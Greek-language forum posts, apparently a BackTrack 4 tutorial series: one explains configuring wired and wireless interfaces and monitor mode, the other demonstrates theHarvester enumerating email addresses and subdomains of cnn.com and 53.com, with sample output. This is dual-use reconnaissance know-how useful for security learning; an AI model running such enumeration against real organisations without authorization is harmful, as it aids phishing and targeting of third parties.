    Προσωπικά πιστεύω ότι η συγκεκριμένη διανομή είναι φτιαγμένη για να δουλεύει σε Laptop, γιατί έχει πολύ όμορφα πράγματα για να κάνεις με την ασύρματη κάρτα δικτύου. Στο παρελθόν θα είχατε διαβάσει σχετικές αναφορές πάνω σε αυτό και γενικότερα στο backtrack στα παρακάτω blog posts μου
    http://autoexec.gr/blogs/blackman/archive/2008/11/28/back-to-back-following-your-track-i-m-using-linux-backtrack.aspx
    http://autoexec.gr/blogs/blackman/archive/2009/11/30/hack-my-it-pro-connections.aspx
    http://autoexec.gr/blogs/blackman/archive/2009/07/05/wifi-cracking.aspx
    http://autoexec.gr/blogs/blackman/archive/2009/07/07/back-to-the-track-4.aspx
    Να θυμάστε ότι αν η κάρτα σας δεν έχει chipset της atheros, τότε έχετε μία κάρτα που δεν μπορεί να κάνει ούτε Monitoring ούτε να στείλει πακέτα, συνεπώς no wifi cracking for you. Όπως και να έχει πάντως αν δεν είναι atheros, θα αναγκαστείτε να την χρησιμοποιήσετε όπως κάνατε μέχρι τώρα.
    ΟΚ. Δεν θέλετε να κάνετε wifi sniffing, ούτε wifi cracking, τίποτα από αυτά. Θέλετε απλά να συνδεθείτε ασύρματα σε κάποιο access point, προφανώς για να έχετε ασύρματο internet και να χρησιμοποιήσετε τα υπόλοιπα όμορφα εργαλεία που υπάρχουν.
    Στον κόσμο της Microsoft έχετε μάθει την εντολή ipconfig και την εντολη route. Στον κόσμο του Linux όμως υπάρχουν οι εξής (και δεν είναι οι μόνες)
    ip
    http://linux-ip.net/gl/ip-cref/
    http://linux.about.com/library/cmd/blcmdl8_ip.htm
    http://www.cyberciti.biz/faq/howto-linux-configuring-default-route-with-ipcommand/
    ifconfig
    http://en.wikipedia.org/wiki/Ifconfig
    http://linux.die.net/man/8/ifconfig
    iwconfig
    http://gd.tuwien.ac.at/linuxcommand.org/man_pages/iwconfig8.html
    http://www.susegeek.com/wireless/iwconfig-wireless-interface-configuration-utility-in-linux/
    Αρχικά τρέχοντας την εντολή ip add θα δείτε κάτι παρόμοιο με αυτό

    Στην περίπτωση μου δεν βλέπετε την ασύρματη κάρτα δικτύου (συνήθως wlan0 ή wifi0) λόγω του ότι πρέπει να ρυθμιστεί σχετικά το WMware workstation. Αν δεν γίνει κατανοητό θα φροντίσω να βάλω print screens από το Laptop που έχω κανονική εγκατάσταση.
    Συνεχίζοντας στο θέμα μας, θα παρατηρήσετε ότι η eth0 είναι DOWN, αντίστοιχα παίζει να βλέπετε και την ασύρματη κάρτα. Ο τρόπος με τον οποίο ‘σηκώνουμε’ κάποιο Interface είναι με την εντολή ifconfig <όνομα Interface> up
    Οπότε η όλη εικόνα που θα έχετε θα είναι κάπως έτσι

    Στην περίπτωση του Ethernet βλέπετε ότι το state είναι UNKNOWN ενώ από κάτω δεν μας έχει φέρει κάποια άλλη πληροφορία. Ο λόγος είναι γιατί απλά δεν έχει πάρει IP.
    Εκεί τρέχουμε την εντολή dhclient για να αναζητήσει διεύθυνση από κάποιον dhcp. Οπότε θα δείτε κάτι σαν το παρακάτω

    Και εκτελώντας πάλι ip add βλέπουμε ότι η κάρτα μας έχει πλέον και διεύθυνση. Οπότε επιβεβαιώνουμε ότι έχουμε σύνδεση.

    Το παραπάνω φυσικά ισχύει τόσο αν το Interface είναι της LAN κάρτας μας, αλλά και για την wireless (θα δούμε παρακάτω πως συνδέεται αρχικά πάνω σε κάποιο access point).
    Η διαφορά όμως με την Wireless για να γίνουν όλα τα παραπάνω είναι ότι ΔΕΝ ΠΡΕΠΕΙ ΝΑ ΕΙΝΑΙ ΣΕ ΚΑΤΑΣΤΑΣΗ MONITORING (που αναφέραμε ότι είναι από default).
    Αυτό το πράγμα είναι απλό και γίνεται με την εντολή airmon-ng (που είναι μέσα στο πακέτο του aircrack-ng).
    Βάζουμε την κάρτα σε monitor mode με την εντολή airmon-ng start <όνομα wireless interface>

    Ενώ αντίστοιχα την βγάζουμε από Monitor Mode με airmon-ng stop <όνομα wireless interface>

    Σε περίπτωση που αντιμετωπίσετε προβλήματα με τα πρώτα βήματα στην ασύρματη κάρτα, πηγαίνετε και σταματήστε monitor mode αν δεν το έχετε κάνει ήδη.
    Θα μου πείτε τώρα
    -Τι μας λες ρε Blackman; ΟΚ την LAN κάρτα την ανεβάσαμε και πήρε και dhcp, κάτι δεν κολλάει όμως με την Wireless. Πως βρίσκω και πως συνδέομαι σε κάποιο access point; Τι dhclient εντολές μας λες; Αφού δεν έχουμε συνδεθεί κάπου.
    Εντάξει. Εφόσον έχετε βεβαιωθεί ότι η κάρτα wifi δεν είναι σε monitor mode και είναι UP τότε εκτελούμε την εντολή iwconfig

    Όπου βλέπουμε την κάρτα μας. Με αυτή την εντολή μπορούμε να συνδεθούμε εκεί που θέλουμε και γενικότερα να διαχειριστούμε την κάρτα μας, αλλά μάλλον προτιμάτε κάτι καλύτερο από αυτό.
    Στο backtrack θα βρείτε και ένα πιο φιλικό Wired & Wireless Connection Manager. Δεν έχετε να κάνετε κάτι περισσότερο από το να τρέξετε wicd start και είτε πηγαίνετε στα settings να τρέξετε το Connection Manager που πλέον έχει εμφανιστεί, ή αμέσως εκτελείτε wicd-client start (αν δεν τρέχετε το πρώτο, δεν θα εκτελεστεί το δεύτερο).

    Οπότε πλέον εμφανίζεται κάτι πιο γνώριμο…

    Οι οθονούλες του networking
    Μέσω του οποίου μπορούμε να ρυθμίσουμε τόσο την wired όσο και την wireless κάρτα μας.

    Φυσικά με το παραπάνω καλύπτεστε και στο θέμα των static ips, καθώς μέσα από τα advanced settings μπορείτε να τα ρυθμίσετε

    Γνωρίζοντας τα παραπάνω νομίζω ότι πλέον, όσοι είχαν εκνευριστεί και παρατήσει το backtrack, είναι ευκαιρία να το ξαναπιάσουν. Ετοιμάστε το για να δοκιμάσετε ότι άλλα θα πούμε σε αυτή την σειρά blog posts για το backtrack.
    Ελπίζω το συγκεκριμένο να βοηθάει όσους αντιμετώπισαν προβλήματα στο παρελθόν με το συγκεκριμένο θέμα. Stay tuned…
    back|track 4 …make it real…

  25. Blackman
    Επόμενο μάθημα στα εργαλεία του Back|Track 4 έχουν να κάνουμε ένα εργαλείο που ονομάζετε The Harvester. Σκοπός του είναι να συλλέξει πληροφορίες όπως λογαριασμοί email, username και hostnames ή subdomains από διάφορες πηγές.
    Οι πηγές αυτές είναι οι παρακάτω:
    Google – emails,subdomains/hostnames Bing search – emails, subdomains/hostnames Pgp servers – emails, subdomains/hostnames Linkedin – usernames MSN.com – emails, subdomains/hostnames (1.4) Τρέχοντας το πρόγραμμα βλέπουμε το παρακάτω (το printscreen είναι από την PreFinal έκδοση (1.4b έκδοση του TheHarvester) για αυτό δεν βλέπετε στα data source το Bing. Στην νεότερη έκδοση (1.6) έχει προστεθεί, ενώ έχει αφαιρεθεί το MSN – προφανώς λόγο αντικατάστασης με το bing)

    Στην τελική έκδοση πρέπει να βλέπεται το παρακάτω στο usage:
    10
    Usage: theharvester options
    11


    12
    -d: domain to search or company name
    13
    -b: data source (google,bing,pgp,linkedin)

    14
    -s: start in result number X (default 0)
    15
    -v: verify host name via dns resolution

    16
    -l: limit the number of results to work with(bing goes from 50 to 50 results,
    17
    google 100 to 100, and pgp does'nt use this option)
    Όπως μπορείτε να δείτε, η χρήση του είναι εύκολη. Αλλά ας δούμε μία δοκιμή με το cnn.com
    01
    root@bt:/pentest/enumeration/google/theharvester# ./theHarvester.py -d cnn.com -l 500 -b bing
    02
    03
    *************************************
    04
    *TheHarvester Ver. 1.6 *
    05
    *Coded by Christian Martorella *
    06
    *Edge-Security Research *
    07
    *[email protected] *
    08
    *************************************
    09
    10
    Searching for cnn.com in bing :
    11
    ======================================
    12
    13
    Limit: 500
    14
    Searching results: 0
    15
    Searching results: 50
    16
    Searching results: 100
    17
    Searching results: 150
    18
    Searching results: 200
    19
    Searching results: 250
    20
    Searching results: 300
    21
    Searching results: 350
    22
    Searching results: 400
    23
    Searching results: 450
    24
    25
    Accounts found:
    26
    ====================
    27
    28
    @cnn.com
    29
    [email protected]
    30
    ====================
    31
    32
    Total results: 2
    33
    34
    Hosts found:
    35
    ====================
    36
    37
    www.cnn.com
    38
    edition.cnn.com
    39
    money.cnn.com
    40
    sportsillustrated.cnn.com
    41
    amfix.blogs.cnn.com
    42
    live.cnn.com
    43
    news.blogs.cnn.com
    44
    politicalticker.blogs.cnn.com
    45
    marquee.blogs.cnn.com
    46
    weather.cnn.com
    47
    m.cnn.com
    48
    transcripts.cnn.com
    49
    www.cnnstudentnews.cnn.com
    50
    ac360.blogs.cnn.com
    51
    campbellbrown.blogs.cnn.com
    52
    newsource.cnn.com
    53
    cgi.cnn.com
    54
    joybehar.blogs.cnn.com
    55
    topics.edition.cnn.com
    56
    internationaldesk.blogs.cnn.com
    57
    us.cnn.com
    58
    larrykinglive.blogs.cnn.com
    59
    topics.cnn.com
    60
    weather.edition.cnn.com
    61
    cnnwire.blogs.cnn.com
    62
    scitech.blogs.cnn.com
    63
    on.cnn.com
    64
    ricksanchez.blogs.cnn.com
    65
    archives.cnn.com
    66
    community.cnn.com
    67
    sports.si.cnn.com
    68
    arabic.cnn.com
    69
    quiz.cnn.com
    70
    newsroom.blogs.cnn.com
    71
    cgi.money.cnn.com
    72
    partners.cnn.com
    73
    pagingdrgupta.blogs.cnn.com
    74
    features.blogs.fortune.cnn.com
    75
    tech.fortune.cnn.com
    76
    insession.blogs.cnn.com
    77
    business.blogs.cnn.com
    78
    behindthescenes.blogs.cnn.com
    79
    olympics.blogs.cnn.com
    80
    afghanistan.blogs.cnn.com
    81
    gdyn.cnn.com
    82
    premium.cnn.com
    83
    inthefield.blogs.cnn.com
    84
    ypwr.blogs.cnn.com
    85
    premium.edition.cnn.com
    86
    edition1.cnn.com
    87
    drgupta.cnn.com
    88
    edition2.cnn.com
    89
    wallstreet.blogs.fortune.cnn.com
    90
    tips.blogs.cnn.com
    91
    mxp.blogs.cnn.com
    Σε αυτή την περίπτωση συνεχίζουμε την αναζήτηση και στις υπόλοιπες μηχανές αναζήτησης για περισσότερα αποτελέσματα. Στο παραπάνω θα παρατηρήσετε ότι μου έφερε μόνο domains/subdomains και όχι emails. Για αυτό όποιος ψάχνει κάτι ίσως το βρει σε άλλη μηχανή αναζήτησης. Όπως μπορείτε να δείτε και λίγο πιο κάτω μία δοκιμή που φέρνει και emails.
    01
    root@bt:/pentest/enumeration/google/theharvester# ./theHarvester.py -d 53.com -l 500 -b google
    02
    03
    *************************************
    04
    *TheHarvester Ver. 1.4b *
    05
    *Coded by Christian Martorella *
    06
    *Edge-Security Research *
    07
    *[email protected] *
    08
    *************************************
    09
    10
    Searching for 53.com in google :
    11
    ======================================
    12
    13
    Limit: 500
    14
    Searching results: 0
    15
    Searching results: 100
    16
    Searching results: 200
    17
    Searching results: 300
    18
    Searching results: 400
    19
    20
    Accounts found:
    21
    ====================
    22
    23
    [email protected]
    24
    @53.com
    25
    [email protected]
    26
    @.53.com
    27
    [email protected]
    28
    [email protected]
    29
    [email protected]
    30
    [email protected]
    31
    [email protected]
    32
    [email protected]
    33
    [email protected]
    34
    [email protected]
    35
    ====================
    36
    37
    Total results: 12
    38
    39
    Hosts found:
    40
    ====================
    41
    42
    www.53.com
    43
    reo.53.com
    44
    direct.53.com
    45
    premierissue.53.com
    46
    retire.53.com
    47
    ir.53.com
    48
    tdsc.53.com
    49
    secure.53.com
    50
    ra.53.com
    51
    2Fwww.53.com
    52
    Www.53.com
    53
    252Fwww.53.com
    54
    espanol.53.com
    55
    employee.53.com
    56
    bnjhz.php?...53.com
    57
    express.53.com
    58
    www.ra.53.com
    59
    Ra.53.com
    60
    3Dreo.53.com
    61
    wwww.53.com
    62
    Retire.53.com
    63
    @.53.com
    64
    www.express.53.com
    65
    mxism.php?...53.com
    66
    pngyo.php?...53.com
    Αρκετά ενδιαφέρον, για κάποιον που ασχολείται με την συλλογή πληροφοριών. Τι λέτε;
    http://www.edge-security.com/theHarvester.php
    Open Source σημαίνει… -> http://www.edge-security.com/soft/theHarvester.py
×
×
  • Create New...